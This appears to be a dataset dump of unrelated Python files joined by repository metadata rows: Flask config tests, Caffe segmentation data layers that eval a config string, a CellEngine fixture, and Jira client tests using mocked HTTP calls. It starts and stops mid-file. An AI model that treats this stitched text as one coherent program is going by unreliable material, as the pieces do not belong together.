)
def test_testing_config(test_app):
test_app.config.from_object("app.config.TestingConfig")
assert test_app.config.get("SECRET_KEY")
assert test_app.config["TESTING"]
assert not test_app.config["PRESERVE_CONTEXT_ON_EXCEPTION"]
assert test_app.config["SQLALCHEMY_DATABASE_URI"] == os.environ.get(
"DATABASE_TEST_URL"
)
def test_production_config(test_app):
test_app.config.from_object("app.config.ProductionConfig")
assert test_app.config.get("SECRET_KEY")
assert not test_app.config["TESTING"]
assert test_app.config["SQLALCHEMY_DATABASE_URI"] == os.environ.get(
"DATABASE_URL"
)
| 31.566667 | 72 | 0.736008 | 128 | 947 | 5.125 | 0.21875 | 0.170732 | 0.257622 | 0.202744 | 0.792683 | 0.728659 | 0.728659 | 0.728659 | 0.672256 | 0.672256 | 0 | 0 | 0.147835 | 947 | 29 | 73 | 32.655172 | 0.812887 | 0 | 0 | 0.434783 | 0 | 0 | 0.284055 | 0.186906 | 0 | 0 | 0 | 0 | 0.434783 | 1 | 0.130435 | false | 0 | 0.043478 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24030e9dd3962f15c25b2ad6dcf6461462457a23 | 9,305 | py | Python | files/Segment/workspace/model/FPN/voc_layers.py | Vertical-Beach/ai-edge-contest4 | 4b5211a9adb383756acade42c8a8b104f6fd7363 | [
"Apache-2.0"
] | 3 | 2021-02-13T05:16:10.000Z | 2022-03-08T16:00:02.000Z | files/Segment/workspace/model/FPN/voc_layers.py | Vertical-Beach/ai-edge-contest4 | 4b5211a9adb383756acade42c8a8b104f6fd7363 | [
"Apache-2.0"
] | null | null | null | files/Segment/workspace/model/FPN/voc_layers.py | Vertical-Beach/ai-edge-contest4 | 4b5211a9adb383756acade42c8a8b104f6fd7363 | [
"Apache-2.0"
] | null | null | null | import caffe
import numpy as np
import cv2
import random
from PIL import Image
class BDD100KDataLayer(caffe.Layer):
    """Caffe Python data layer feeding (image, label) batches from the
    BDD100K segmentation dataset.

    Each forward pass fills a batch with uniformly sampled entries from
    the file list. Entries with index below ``nof_data_on_memory`` are
    served from an in-memory cache filled at setup time; the rest are
    loaded from disk on demand.
    """

    def setup(self, bottom, top):
        """Parse ``param_str`` and preload the configured number of samples.

        Expected params (a Python dict literal in the prototxt):
        - bdd100k_label_dir / bdd100k_image_dir: dataset directories
        - filelist: text file with one sample id per line
        - mean: per-channel mean to subtract (applied before BGR swap)
        - randomize: load in random order (default True)
        - seed: randomization seed (default None / current time)
        - resize_size_y / resize_size_x: network input size (default 256x512)
        - scale: multiplicative scale applied before mean subtraction
        - batch_size: samples per forward pass (default 4)
        - nof_data_on_memory: how many samples to cache in RAM (default 0)
        """
        # NOTE(security): param_str comes from the prototxt and is eval'd
        # as arbitrary Python -- only use trusted model definitions.
        params = eval(self.param_str)
        self.bdd100k_label_dir = params['bdd100k_label_dir']
        self.bdd100k_image_dir = params['bdd100k_image_dir']
        self.filelist = params['filelist']
        self.mean = np.array(params['mean'])
        self.random = params.get('randomize', True)
        self.seed = params.get('seed', None)
        self.resize_size_y = int(params.get('resize_size_y', 256))
        self.resize_size_x = int(params.get('resize_size_x', 512))
        self.scale = params.get('scale', 0.022)
        self.batch_size = int(params.get('batch_size', 4))
        self.nof_data_on_memory = params.get('nof_data_on_memory', 0)
        # two tops: data and label
        if len(top) != 2:
            raise Exception("Need to define two tops: data and label.")
        # data layers have no bottoms
        if len(bottom) != 0:
            raise Exception("Do not define a bottom.")
        # Load the sample ids; the 'with' closes the handle (previously leaked).
        with open(self.filelist, 'r') as filelist_fp:
            self.datapaths = filelist_fp.read().splitlines()
        # Preload the first nof_data_on_memory samples into RAM.
        self.datas = []
        self.labels = []
        for i, datapath in enumerate(self.datapaths):
            if self.nof_data_on_memory <= i:
                break
            print("loading " + str(i))
            self.datas.append(self.load_image(datapath))
            self.labels.append(self.load_label(datapath))
        random.seed(self.seed)

    def reshape(self, bottom, top):
        # Fixed output shapes: data (N, 3, H, W), label (N, 1, H, W).
        top[0].reshape(self.batch_size, 3, self.resize_size_y, self.resize_size_x)
        top[1].reshape(self.batch_size, 1, self.resize_size_y, self.resize_size_x)

    def forward(self, bottom, top):
        # Fill the batch with uniformly sampled entries; cached samples
        # are reused, the others are loaded from disk.
        for i in range(self.batch_size):
            idx = random.randint(0, len(self.datapaths) - 1)
            if idx < self.nof_data_on_memory:
                top[0].data[i, ...] = self.datas[idx]
                top[1].data[i, ...] = self.labels[idx]
            else:
                top[0].data[i, ...] = self.load_image(self.datapaths[idx])
                top[1].data[i, ...] = self.load_label(self.datapaths[idx])

    def backward(self, top, propagate_down, bottom):
        # Data layers do not backpropagate.
        pass

    def load_image(self, idx):
        """
        Load input image and preprocess for Caffe:
        - cast to float
        - resize to (resize_size_x, resize_size_y)
        - multiply scale value
        - subtract mean
        - switch channels RGB -> BGR
        - transpose to channel x height x width order
        """
        im = Image.open('{}/{}.jpg'.format(self.bdd100k_image_dir, idx))
        in_ = np.array(im, dtype=np.float32)
        in_ = cv2.resize(in_, (self.resize_size_x, self.resize_size_y))
        in_ = in_ * self.scale
        in_ -= self.mean
        in_ = in_[:, :, ::-1]
        in_ = in_.transpose((2, 0, 1))
        return in_

    def load_label(self, idx):
        """
        Load label image as 1 x height x width integer array of label
        indices, remapping BDD100K train ids (road 0, signal 6,
        person 11, car 13) to the 5-class scheme:
        road 0, person 1, signal 2, car 3, other 4.
        The leading singleton dimension is required by the loss.
        """
        pil_img = Image.open('{}/{}_train_id.png'.format(self.bdd100k_label_dir, idx))
        img = np.asarray(pil_img)
        OTHER = 4
        # Everything that is not road/signal/person/car collapses to OTHER.
        img = np.where((img != 0) & (img != 6) & (img != 11) & (img != 13), OTHER, img)
        img = np.where(img == 11, 1, img)
        img = np.where(img == 6, 2, img)
        img = np.where(img == 13, 3, img)
        # Nearest-neighbour keeps label values categorical when resizing.
        img = cv2.resize(img, (self.resize_size_x, self.resize_size_y), interpolation=cv2.INTER_NEAREST)
        label = img[np.newaxis, ...]
        return label
class SignateDataLayer(caffe.Layer):
    """Caffe Python data layer feeding (image, label) batches from the
    SIGNATE contest dataset (raw ``.dat`` label files).

    Mirrors :class:`BDD100KDataLayer`: each forward pass fills a batch
    with uniformly sampled entries, serving indices below
    ``nof_data_on_memory`` from an in-memory cache.
    """

    def setup(self, bottom, top):
        """Parse ``param_str`` and preload the configured number of samples.

        Expected params (a Python dict literal in the prototxt):
        - signate_label_dir / signate_image_dir: dataset directories
        - filelist: text file with one sample id per line
        - mean: per-channel mean to subtract (applied before BGR swap)
        - randomize: load in random order (default True)
        - seed: randomization seed (default None / current time)
        - resize_size_y / resize_size_x: network input size (default 256x512)
        - scale: multiplicative scale applied before mean subtraction
        - batch_size: samples per forward pass (default 4)
        - nof_data_on_memory: how many samples to cache in RAM (default 0)
        """
        # NOTE(security): param_str comes from the prototxt and is eval'd
        # as arbitrary Python -- only use trusted model definitions.
        params = eval(self.param_str)
        self.signate_label_dir = params['signate_label_dir']
        self.signate_image_dir = params['signate_image_dir']
        self.filelist = params['filelist']
        self.mean = np.array(params['mean'])
        self.random = params.get('randomize', True)
        self.seed = params.get('seed', None)
        self.resize_size_y = int(params.get('resize_size_y', 256))
        self.resize_size_x = int(params.get('resize_size_x', 512))
        self.scale = params.get('scale', 0.022)
        self.batch_size = int(params.get('batch_size', 4))
        # Default 0 (was False -- numerically identical) to match
        # BDD100KDataLayer.
        self.nof_data_on_memory = params.get('nof_data_on_memory', 0)
        # two tops: data and label
        if len(top) != 2:
            raise Exception("Need to define two tops: data and label.")
        # data layers have no bottoms
        if len(bottom) != 0:
            raise Exception("Do not define a bottom.")
        # Load the sample ids; the 'with' closes the handle (previously leaked).
        with open(self.filelist, 'r') as filelist_fp:
            self.datapaths = filelist_fp.read().splitlines()
        # Preload the first nof_data_on_memory samples into RAM.
        self.datas = []
        self.labels = []
        for i, datapath in enumerate(self.datapaths):
            if self.nof_data_on_memory <= i:
                break
            print("loading " + str(i))
            self.datas.append(self.load_image(datapath))
            self.labels.append(self.load_label(datapath))
        random.seed(self.seed)

    def reshape(self, bottom, top):
        # Fixed output shapes: data (N, 3, H, W), label (N, 1, H, W).
        top[0].reshape(self.batch_size, 3, self.resize_size_y, self.resize_size_x)
        top[1].reshape(self.batch_size, 1, self.resize_size_y, self.resize_size_x)

    def forward(self, bottom, top):
        # Fill the batch with uniformly sampled entries; cached samples
        # are reused, the others are loaded from disk.
        for i in range(self.batch_size):
            idx = random.randint(0, len(self.datapaths) - 1)
            if idx < self.nof_data_on_memory:
                top[0].data[i, ...] = self.datas[idx]
                top[1].data[i, ...] = self.labels[idx]
            else:
                top[0].data[i, ...] = self.load_image(self.datapaths[idx])
                top[1].data[i, ...] = self.load_label(self.datapaths[idx])

    def backward(self, top, propagate_down, bottom):
        # Data layers do not backpropagate.
        pass

    def load_image(self, idx):
        """
        Load input image and preprocess for Caffe:
        - cast to float
        - resize to (resize_size_x, resize_size_y)
        - multiply scale value
        - subtract mean
        - switch channels RGB -> BGR
        - transpose to channel x height x width order
        """
        im = Image.open('{}/{}.jpg'.format(self.signate_image_dir, idx))
        in_ = np.array(im, dtype=np.float32)
        in_ = cv2.resize(in_, (self.resize_size_x, self.resize_size_y))
        in_ = in_ * self.scale
        in_ -= self.mean
        in_ = in_[:, :, ::-1]
        in_ = in_.transpose((2, 0, 1))
        return in_

    def load_label(self, idx):
        """
        Load a raw 1216x1936 uint8 label file as a 1 x height x width
        integer array (leading singleton dim required by the loss).
        Classes: road 0, person 1, signal 2, car 3, other 4.
        """
        path = '{}/{}.dat'.format(self.signate_label_dir, idx)
        # 'with' guarantees the handle is closed even if reshape fails.
        with open(path, 'rb') as fp:
            dat = np.fromfile(fp, np.uint8, -1)
        dat = dat.reshape((1216, 1936, 1))
        # Nearest-neighbour keeps label values categorical when resizing.
        dat = cv2.resize(dat, (self.resize_size_x, self.resize_size_y), interpolation=cv2.INTER_NEAREST)
        label = dat[np.newaxis, ...]
        return label
| 39.096639 | 104 | 0.596668 | 1,253 | 9,305 | 4.308061 | 0.177973 | 0.044461 | 0.051871 | 0.027788 | 0.892923 | 0.886995 | 0.881067 | 0.881067 | 0.881067 | 0.881067 | 0 | 0.036514 | 0.284793 | 9,305 | 237 | 105 | 39.261603 | 0.774606 | 0.289737 | 0 | 0.755906 | 0 | 0 | 0.069863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.094488 | false | 0.015748 | 0.03937 | 0 | 0.181102 | 0.015748 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2422207674ef73541fcd886848624ae2cd91c8d4 | 6,341 | py | Python | tests/fixtures/api-scalesets.py | primitybio/cellengine-python-toolk | 1f9dd168f1f27e2beba69f02e340371190857b33 | [
"MIT"
] | 4 | 2021-01-12T17:03:37.000Z | 2021-12-16T13:23:57.000Z | tests/fixtures/api-scalesets.py | primitybio/cellengine-python-toolk | 1f9dd168f1f27e2beba69f02e340371190857b33 | [
"MIT"
] | 61 | 2021-01-11T05:27:16.000Z | 2022-03-08T01:50:09.000Z | tests/fixtures/api-scalesets.py | primitybio/cellengine-python-toolkit | 1f9dd168f1f27e2beba69f02e340371190857b33 | [
"MIT"
] | null | null | null | import pytest
@pytest.fixture(scope="session")
def scalesets():
    """Return a canned CellEngine scale-set API payload for tests.

    The payload mirrors a GET /scalesets response: six linear scatter
    channels, eighteen arcsinh fluorescence channels (cofactor 150),
    and a final linear Time channel -- 25 scales total.

    The original spelled out every scale as a copy-pasted literal; the
    list is now generated from the channel-name tables, which keeps the
    fixture readable and makes adding a channel a one-line change.
    """
    linear_scale = {"maximum": 262144, "minimum": 1, "type": "LinearScale"}
    arcsinh_scale = {
        "cofactor": 150,
        "maximum": 262144,
        "minimum": -200,
        "type": "ArcSinhScale",
    }
    # Order matters: consumers may index into "scales" positionally.
    linear_channels = ["FSC-A", "FSC-H", "FSC-W", "SSC-A", "SSC-H", "SSC-W"]
    arcsinh_channels = [
        "Blue530-A", "Blue695-A", "Vio450-A", "Vio525-A", "Vio585-A",
        "Vio605-A", "Vio710-A", "Vio655-A", "Red780-A", "UV530-A",
        "Red670-A", "YG780-A", "YG610-A", "YG670-A", "Red730-A",
        "YG710-A", "UV450-A", "YG582-A",
    ]
    # dict(...) copies so each entry owns its scale (as the literals did).
    scales = [
        {"channelName": name, "scale": dict(linear_scale)}
        for name in linear_channels
    ]
    scales.extend(
        {"channelName": name, "scale": dict(arcsinh_scale)}
        for name in arcsinh_channels
    )
    scales.append({"channelName": "Time", "scale": dict(linear_scale)})
    return {
        "__v": 0,
        "_id": "5d38a6f79fae87499999a74c",
        "experimentId": "5d38a6f79fae87499999a74b",
        "name": "Scale Set 1",
        "scales": scales,
        "updated": "2019-07-24T18:44:07.664Z",
    }
| 30.781553 | 82 | 0.297429 | 314 | 6,341 | 5.996815 | 0.187898 | 0.172597 | 0.265534 | 0.162507 | 0.839087 | 0.839087 | 0.839087 | 0.817313 | 0.817313 | 0.640467 | 0 | 0.133574 | 0.56316 | 6,341 | 205 | 83 | 30.931707 | 0.546209 | 0 | 0 | 0.477833 | 0 | 0 | 0.249961 | 0.011355 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004926 | false | 0 | 0.004926 | 0 | 0.014778 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3017f059d9529fe37a02bd26bde5213af4607afe | 45,806 | py | Python | tests/projecttracking/jira/test_jira.py | jander99/flow | 33c418547e3693bf277fd6d089d5f3242c83e14a | [
"Apache-2.0"
] | 36 | 2017-12-09T01:12:58.000Z | 2021-07-23T22:03:05.000Z | tests/projecttracking/jira/test_jira.py | jander99/flow | 33c418547e3693bf277fd6d089d5f3242c83e14a | [
"Apache-2.0"
] | 27 | 2018-02-09T01:13:13.000Z | 2021-07-28T12:44:39.000Z | tests/projecttracking/jira/test_jira.py | jander99/flow | 33c418547e3693bf277fd6d089d5f3242c83e14a | [
"Apache-2.0"
] | 42 | 2017-12-11T15:58:24.000Z | 2022-01-19T21:42:33.000Z | import base64
import configparser
import json
import os
from unittest.mock import MagicMock
from unittest.mock import Mock
from unittest.mock import patch
from unittest.mock import call
from unittest.mock import ANY
import pytest
from flow.projecttracking.jira.jira import Jira
from flow.buildconfig import BuildConfig
# --- Canned flow BuildConfig documents shared by the Jira tests ---

# Standard single-project config: one Jira project key under
# projectTracking.jira.projectKey.
mock_build_config_dict = {
    "projectInfo": {
        "name": "testproject"
    },
    "projectTracking": {
        "jira": {
            "projectKey": "TEST"
        }
    },
    "environments": {
        "unittest": {
            "artifactCategory": "release"
        }
    },
    "slack": {
        "botName": "Flow",
        "emoji": ":robot_face:",
        "channel": "#spigot-ci"
    }
}

# Multi-project config: a list of keys under projectKeys instead of the
# single projectKey.
mock_build_config_dict_multi_projects = {
    "projectInfo": {
        "name": "testproject"
    },
    "projectTracking": {
        "jira": {
            "projectKeys": ["TEST", "TEST2"]
        }
    },
    "environments": {
        "unittest": {
            "artifactCategory": "release"
        }
    },
    "slack": {
        "botName": "Flow",
        "emoji": ":robot_face:",
        "channel": "#spigot-ci"
    }
}

# Invalid config: the projectTracking section is absent entirely.
mock_build_config_missing_jira_dict = {
    "projectInfo": {
        "name": "testproject"
    },
    "environments": {
        "unittest": {
            "artifactCategory": "release"
        }
    },
    "slack": {
        "botName": "Flow",
        "emoji": ":robot_face:",
        "channel": "#spigot-ci"
    }
}

# Invalid config: projectTracking.jira exists but carries neither
# projectKey nor projectKeys.
mock_build_config_missing_project_id_dict = {
    "projectInfo": {
        "name": "testproject"
    },
    "projectTracking": {
        "jira": {
        }
    },
    "environments": {
        "unittest": {
            "artifactCategory": "release"
        }
    },
    "slack": {
        "botName": "Flow",
        "emoji": ":robot_face:",
        "channel": "#spigot-ci"
    }
}

# Ambiguous config: both projectKey and projectKeys are present.
mock_build_config_dict_both_project_ids = {
    "projectInfo": {
        "name": "testproject"
    },
    "projectTracking": {
        "jira": {
            "projectKey": "TEST",
            "projectKeys": ["TEST", "TEST2"]
        }
    },
    "environments": {
        "unittest": {
            "artifactCategory": "release"
        }
    },
    "slack": {
        "botName": "Flow",
        "emoji": ":robot_face:",
        "channel": "#spigot-ci"
    }
}

# Minimal settings.ini content with a jira url.
# NOTE(review): most tests below build a ConfigParser directly instead
# of parsing this string -- confirm whether it is still used.
mock_setting_ini = """
[jira]
url = https://thd.atlassian.net
"""
def mock_get_multiple_project_story_details_response(*args, **kwargs):
    """Stand-in for ``requests.get`` on per-story Jira issue lookups.

    Known story URLs (TEST-123, TEST-456, TEST2-123) return 200 with the
    canned payload from jira_stories_bug.json; TEST-468 simulates a
    missing issue (404, empty body); anything else is a 500.
    """
    test_dir = os.path.dirname(os.path.realpath(__file__))
    with open(test_dir + "/jira_stories_bug.json", 'r') as story_file:
        story_payload = story_file.read()
    issue_base = 'http://happy.happy.joy.joy/rest/api/3/issue/'
    found_urls = (
        issue_base + 'TEST-123',
        issue_base + 'TEST-456',
        issue_base + 'TEST2-123',
    )
    response = Mock()
    response.text = story_payload
    if args[0] in found_urls:
        response.status_code = 200
    elif args[0] == issue_base + 'TEST-468':
        response.text = ''
        response.status_code = 404
    else:
        response.text = []
        response.status_code = 500
    return response
def mock_get_multiple_project_labels_response(*args, **kwargs):
    """Stand-in for ``requests.put`` when tagging stories with a fix
    version: some stories accept the update (204), some are missing
    (404), and unknown URLs fail (500). The body is always empty.
    """
    issue_base = 'http://happy.happy.joy.joy/rest/api/3/issue/'
    status_by_url = {
        issue_base + 'TEST-123': 204,
        issue_base + 'TEST2-123': 404,
        issue_base + 'TEST-456': 404,
        issue_base + 'TEST2-456': 204,
    }
    response = Mock()
    response.text = ''
    response.status_code = status_by_url.get(args[0], 500)
    return response
def mock_get_multiple_project_ids_response(*args, **kwargs):
    """Stand-in for ``requests.get`` on Jira GET /project/{keyOrId}.

    Known lookups -- by key (TEST, TEST2) or by id (123456, 1234567) --
    return 200 with a minimal project payload; anything else returns
    Jira's 404 error body.

    Fixes vs. original: removes a leftover debug ``print`` and collapses
    four copy-pasted payload literals into a lookup table.
    """
    project_base = 'http://happy.happy.joy.joy/rest/api/3/project/'
    # key-or-id -> (project id, project key)
    known_projects = {
        project_base + 'TEST': ('123456', 'TEST'),
        project_base + '123456': ('123456', 'TEST'),
        project_base + 'TEST2': ('1234567', 'TEST2'),
        project_base + '1234567': ('1234567', 'TEST2'),
    }
    response = Mock()
    if args[0] in known_projects:
        project_id, project_key = known_projects[args[0]]
        payload = {
            "id": project_id,
            "self": "http://happy.happy.joy.joy/rest/api/3/project/fake",
            "key": project_key
        }
        response.status_code = 200
    else:
        payload = {
            "errorMessage": [
                "No project could be found with key/id"
            ],
            "errors": {}
        }
        response.status_code = 404
    response.text = json.dumps(payload, default=lambda o: o.__dict__, sort_keys=False, indent=4)
    return response
def mock_get_project_versions(*args, **kwargs):
    """Stand-in for ``requests.get`` on Jira GET /project/{keyOrId}/versions.

    Project TEST (id 123456) already has versions testproject-v0.1/v0.2;
    project TEST2 (id 1234567) has testproject-v0.9/v1.0. Unknown
    projects return Jira's 404 error body.

    Fixes vs. original: removes a leftover debug ``print`` and collapses
    four copy-pasted version-list literals into a lookup table.
    """
    test_versions = [("11123", "testproject-v0.1"), ("11124", "testproject-v0.2")]
    test2_versions = [("11223", "testproject-v0.9"), ("11224", "testproject-v1.0")]
    project_base = 'http://happy.happy.joy.joy/rest/api/3/project/'
    versions_by_url = {
        project_base + 'TEST/versions': test_versions,
        project_base + '123456/versions': test_versions,
        project_base + 'TEST2/versions': test2_versions,
        project_base + '1234567/versions': test2_versions,
    }
    response = Mock()
    if args[0] in versions_by_url:
        payload = [
            {
                "id": version_id,
                "self": "http://happy.happy.joy.joy/rest/api/3/version/" + version_id,
                "name": version_name
            }
            for version_id, version_name in versions_by_url[args[0]]
        ]
        response.status_code = 200
    else:
        payload = {
            "errorMessage": [
                "No project could be found with key/id"
            ],
            "errors": {}
        }
        response.status_code = 404
    response.text = json.dumps(payload, default=lambda o: o.__dict__, sort_keys=False, indent=4)
    return response
def test_no_initialize_object(monkeypatch):
    """Jira() should construct successfully when credentials are present
    and the project lookup in its constructor gets a 200 response.

    Fixes vs. original: removes a stray no-op ``_b.settings`` expression
    statement and three unused locals (basic_auth/headers/timeout).
    """
    # Credentials the Jira client reads from the environment.
    monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
    monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
    _b = MagicMock(BuildConfig)
    _b.build_env_info = mock_build_config_dict['environments']['unittest']
    _b.json_config = mock_build_config_dict
    # settings.ini equivalent pointing at a fake Jira base URL.
    parser = configparser.ConfigParser()
    parser.add_section('jira')
    parser.set('jira', 'url', 'http://happy.happy.joy.joy')
    _b.settings = parser
    with patch('requests.get') as mock_request:
        current_test_directory = os.path.dirname(os.path.realpath(__file__))
        with open(current_test_directory + "/jira_projects.json", 'r') as myfile:
            jira_project_data = json.loads(myfile.read())
        jira_project = json.dumps(jira_project_data["projects"][0], default=lambda o: o.__dict__, sort_keys=False, indent=4)
        # The constructor's project lookup is answered with this payload.
        mock_request.return_value.text = jira_project
        mock_request.return_value.status_code = 200
        _jira = Jira(config_override=_b)
        assert _jira is not None
def test_get_details_for_all_stories(monkeypatch):
    """get_details_for_all_stories should GET each story key from the
    Jira issue endpoint with Basic-auth headers and return the parsed
    issue payloads.
    """
    # Credentials the Jira client reads from the environment.
    monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
    monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
    _b = MagicMock(BuildConfig)
    _b.build_env_info = mock_build_config_dict['environments']['unittest']
    _b.json_config = mock_build_config_dict
    # settings.ini equivalent pointing at a fake Jira base URL.
    parser = configparser.ConfigParser()
    parser.add_section('jira')
    parser.set('jira', 'url', 'http://happy.happy.joy.joy')
    _b.settings = parser
    with patch('requests.get') as mock_request:
        # Expected auth header: HTTP Basic over base64("user:token").
        basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
        headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
        timeout = 30
        current_test_directory = os.path.dirname(os.path.realpath(__file__))
        with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
            jira_data = myfile.read()
        with open(current_test_directory + "/jira_projects.json", 'r') as myfile:
            jira_project_data = json.loads(myfile.read())
        jira_project = json.dumps(jira_project_data["projects"][0], default=lambda o: o.__dict__, sort_keys=False, indent=4)
        # First stubbed response satisfies the project lookup in Jira.__init__.
        mock_request.return_value.text = jira_project
        mock_request.return_value.status_code = 200
        _jira = Jira(config_override=_b)
        # Subsequent GETs (one per story) return the canned story payload.
        mock_request.return_value.text = jira_data
        mock_request.return_value.status_code = 200
        story_details = _jira.get_details_for_all_stories(story_list=["TEST-123", "TEST-456"])
        mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
                                     headers=headers, timeout=timeout)
        mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
                                     headers=headers, timeout=timeout)
        assert story_details[0] == json.loads(jira_data)
def test_get_details_for_all_stories_for_multiple_projects(monkeypatch):
    """With a multi-project config, get_details_for_all_stories should
    look up stories across both configured Jira projects; a 404 on one
    story (TEST-468) must not prevent the others from being returned.
    """
    # Credentials the Jira client reads from the environment.
    monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
    monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
    _b = MagicMock(BuildConfig)
    _b.build_env_info = mock_build_config_dict_multi_projects['environments']['unittest']
    _b.json_config = mock_build_config_dict_multi_projects
    # settings.ini equivalent pointing at a fake Jira base URL.
    parser = configparser.ConfigParser()
    parser.add_section('jira')
    parser.set('jira', 'url', 'http://happy.happy.joy.joy')
    _b.settings = parser
    with patch('requests.get') as mock_request:
        # Expected auth header: HTTP Basic over base64("user:token").
        basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
        headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
        timeout = 30
        current_test_directory = os.path.dirname(os.path.realpath(__file__))
        with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
            jira_data = myfile.read()
        # Constructor resolves both project keys via the ids mock; the
        # per-story lookups then use the story-details mock.
        mock_request.side_effect = mock_get_multiple_project_ids_response
        _jira = Jira(config_override=_b)
        mock_request.side_effect = mock_get_multiple_project_story_details_response
        story_details = _jira.get_details_for_all_stories(story_list=["TEST-123", "TEST-456", "TEST-468", "TEST2-123"])
        # One GET per story id (four in total).
        mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
                                     headers=headers, timeout=timeout)
        mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
                                     headers=headers, timeout=timeout)
        mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-468',
                                     headers=headers, timeout=timeout)
        mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST2-123',
                                     headers=headers, timeout=timeout)
        assert story_details[0] == json.loads(jira_data)
def test_tag_stories_in_commit(monkeypatch):
    """tag_stories_in_commit should POST a new fix version (it does not
    exist yet for v1.0) and then PUT it onto each story's fixVersions.
    """
    # Credentials the Jira client reads from the environment.
    monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
    monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
    _b = MagicMock(BuildConfig)
    _b.build_env_info = mock_build_config_dict['environments']['unittest']
    _b.project_name = mock_build_config_dict['projectInfo']['name']
    _b.version_number = 'v1.0'
    _b.json_config = mock_build_config_dict
    # settings.ini equivalent pointing at a fake Jira base URL.
    parser = configparser.ConfigParser()
    parser.add_section('jira')
    parser.set('jira', 'url', 'http://happy.happy.joy.joy')
    _b.settings = parser
    with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
        # Expected auth header: HTTP Basic over base64("user:token").
        basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
        headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
        timeout = 30
        # Expected POST body creating the fix version on project 123456.
        project = {
            "projectId": "123456",
            "name": "testproject-v1.0"
        }
        # Expected PUT body adding the fix version to a story.
        version = {
            "update": {
                "fixVersions": [
                    {
                        "add": {
                            "name": "testproject-v1.0"
                        }
                    }
                ]
            }
        }
        # Constructor resolves the project key; subsequent GETs list the
        # existing versions (v1.0 is not among them).
        mock_get_request.side_effect = mock_get_multiple_project_ids_response
        _jira = Jira(config_override=_b)
        mock_get_request.side_effect = mock_get_project_versions
        mock_post_request.return_value.text = ''
        mock_post_request.return_value.status_code = 201
        mock_put_request.return_value.text = ''
        mock_put_request.return_value.status_code = 204
        mock_get_calls = [
            call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
                 headers=headers, timeout=timeout),
            call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
                 headers=headers, timeout=timeout)
        ]
        _jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST-456'])
        mock_get_request.assert_has_calls(mock_get_calls)
        # Exactly one version is created, then applied to both stories.
        mock_post_request.assert_called_once_with('http://happy.happy.joy.joy/rest/api/3/version',
                                                  ANY, headers=headers, timeout=timeout)
        mock_post_request_calls = mock_post_request.call_args_list
        call_args, call_kwargs = mock_post_request_calls[0]
        post_data_arg = call_args[1]
        assert project == json.loads(post_data_arg)
        mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
                                         ANY, headers=headers, timeout=timeout)
        mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
                                         ANY, headers=headers, timeout=timeout)
        mock_put_request_calls = mock_put_request.call_args_list
        # Every PUT must carry the same fixVersions update body.
        for i, put_call in enumerate(mock_put_request_calls):
            call_args, call_kwargs = put_call
            put_data_arg = call_args[1]
            assert version == json.loads(put_data_arg)
def test_tag_stories_in_commit_with_existing_version(monkeypatch):
    """When the fix version already exists (v0.1 is in the mocked
    version list), tag_stories_in_commit must not POST a new version and
    should only PUT the existing one onto each story.
    """
    # Credentials the Jira client reads from the environment.
    monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
    monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
    _b = MagicMock(BuildConfig)
    _b.build_env_info = mock_build_config_dict['environments']['unittest']
    _b.project_name = mock_build_config_dict['projectInfo']['name']
    _b.version_number = 'v0.1'
    _b.json_config = mock_build_config_dict
    # settings.ini equivalent pointing at a fake Jira base URL.
    parser = configparser.ConfigParser()
    parser.add_section('jira')
